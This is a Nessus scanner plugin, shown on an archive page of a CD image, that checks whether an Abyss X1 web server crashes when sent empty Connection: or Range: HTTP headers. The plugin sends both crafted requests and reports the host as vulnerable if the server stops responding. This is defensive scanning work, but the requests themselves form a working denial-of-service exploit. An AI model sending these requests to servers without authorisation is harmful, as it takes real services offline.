home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / abyss_dos.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  84 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. # GPL
  4. #
  5. # References:
  6. # Date: Sat, 5 Apr 2003 12:21:48 +0000
  7. # From: Auriemma Luigi <aluigi@pivx.com>
  8. # To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
  9. #        full-disclosure@lists.netsys.com, list@dshield.org
  10. # Subject: [VulnWatch] Abyss X1 1.1.2 remote crash
  11.  
  12.  
  13. if(description)
  14. {
  15.  script_id(11521);
  16.  script_bugtraq_id(7287);
  17.  script_version ("$Revision: 1.6 $");
  18.  name["english"] = "Abyss httpd crash";
  19.  script_name(english:name["english"]);
  20.  
  21.  desc["english"] = "
  22. It was possible to kill the web server by
  23. sending empty HTTP fields (namely Connection: and Range: ).
  24.  
  25. An attacker may use this flaw to prevent this host from performing
  26. its job properly.
  27.  
  28.  
  29. Solution : If the remote web server is Abyss X1, then upgrade to 
  30. Abyss X1 v.1.1.4, otherwise inform your vendor of this flaw.
  31.  
  32. Risk factor : High";
  33.  
  34.  script_description(english:desc["english"]);
  35.  
  36.  summary["english"] = "Empty HTTP fields crash the remote web server";
  37.  script_summary(english:summary["english"]);
  38.  
  39.  script_category(ACT_DENIAL);
  40.  
  41.  script_copyright(english:"This script is Copyright (C) 2003 Renaud Deraison");
  42.  family["english"] = "Denial of Service";
  43.  script_family(english:family["english"]);
  44.  script_dependencies("find_service.nes", "no404.nasl", "http_version.nasl");
  45.  script_require_ports("Services/www", 80);
  46.  exit(0);
  47. }
  48.  
  49. ########
  50.  
  51.  
  52. include("http_func.inc");
  53.  
  54. port = get_http_port(default:80);
  55.  
  56. if(! get_port_state(port)) exit(0);
  57.  
  58. if(http_is_dead(port:port))exit(0);
  59.  
  60. req = string("GET / HTTP/1.0\r\n", "Connection: \r\n\r\n");
  61. soc = http_open_socket(port);
  62. if(! soc) exit(0);
  63.  
  64. send(socket:soc, data: req);
  65. r = http_recv(socket:soc);
  66. http_close_socket(soc);
  67.  
  68.  
  69.  
  70. if(http_is_dead(port: port)) { security_hole(port); }
  71.  
  72.  
  73.  
  74. req = string("GET / HTTP/1.0\r\n", "Range: \r\n\r\n");
  75. soc = http_open_socket(port);
  76. if(! soc) exit(0);
  77.  
  78. send(socket:soc, data: req);
  79. r = http_recv(socket:soc);
  80. http_close_socket(soc);
  81.  
  82. if(http_is_dead(port: port)) { security_hole(port); }
  83.